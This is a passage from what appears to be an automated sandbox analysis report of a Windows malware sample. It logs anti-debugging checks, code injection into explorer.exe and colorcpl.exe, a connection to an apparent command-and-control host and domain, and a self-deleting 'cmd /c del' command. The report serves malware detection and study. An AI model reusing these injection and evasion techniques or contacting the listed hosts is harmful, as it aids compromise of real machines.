          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017614FB mov eax, dword ptr fs:[00000030h]11_2_017614FB
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778CD6 mov eax, dword ptr fs:[00000030h]11_2_01778CD6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B849B mov eax, dword ptr fs:[00000030h]11_2_016B849B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BFF60 mov eax, dword ptr fs:[00000030h]11_2_016BFF60
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778F6A mov eax, dword ptr fs:[00000030h]11_2_01778F6A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BEF40 mov eax, dword ptr fs:[00000030h]11_2_016BEF40
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A4F2E mov eax, dword ptr fs:[00000030h]11_2_016A4F2E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A4F2E mov eax, dword ptr fs:[00000030h]11_2_016A4F2E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DE730 mov eax, dword ptr fs:[00000030h]11_2_016DE730
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FF10 mov eax, dword ptr fs:[00000030h]11_2_0173FF10
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FF10 mov eax, dword ptr fs:[00000030h]11_2_0173FF10
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA70E mov eax, dword ptr fs:[00000030h]11_2_016DA70E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA70E mov eax, dword ptr fs:[00000030h]11_2_016DA70E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177070D mov eax, dword ptr fs:[00000030h]11_2_0177070D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177070D mov eax, dword ptr fs:[00000030h]11_2_0177070D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CF716 mov eax, dword ptr fs:[00000030h]11_2_016CF716
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E37F5 mov eax, dword ptr fs:[00000030h]11_2_016E37F5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B8794 mov eax, dword ptr fs:[00000030h]11_2_016B8794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B766D mov eax, dword ptr fs:[00000030h]11_2_016B766D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175FE3F mov eax, dword ptr fs:[00000030h]11_2_0175FE3F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AE620 mov eax, dword ptr fs:[00000030h]11_2_016AE620
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D8E00 mov eax, dword ptr fs:[00000030h]11_2_016D8E00
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA61C mov eax, dword ptr fs:[00000030h]11_2_016DA61C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA61C mov eax, dword ptr fs:[00000030h]11_2_016DA61C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B76E2 mov eax, dword ptr fs:[00000030h]11_2_016B76E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D16E0 mov ecx, dword ptr fs:[00000030h]11_2_016D16E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778ED6 mov eax, dword ptr fs:[00000030h]11_2_01778ED6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D36CC mov eax, dword ptr fs:[00000030h]11_2_016D36CC
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E8EC7 mov eax, dword ptr fs:[00000030h]11_2_016E8EC7
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175FEC0 mov eax, dword ptr fs:[00000030h]11_2_0175FEC0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017246A7 mov eax, dword ptr fs:[00000030h]11_2_017246A7
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FE87 mov eax, dword ptr fs:[00000030h]11_2_0173FE87
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Code function: 11_2_0040ACF0 LdrLoadDll
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 66.235.200.145 80
          Source: C:\Windows\explorer.exe Domain query: www.adornmentwithadrienne.com
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 1210000
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Memory written: C:\Users\user\Desktop\ClbrTLBbVA.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3452
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Process created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}
          Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"
          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 0000000C.00000002.537473744.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.317619490.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000002.527288970.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.304955172.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
          Source: explorer.exe, 0000000C.00000000.305531368.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.528766167.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Users\user\Desktop\ClbrTLBbVA.exe VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
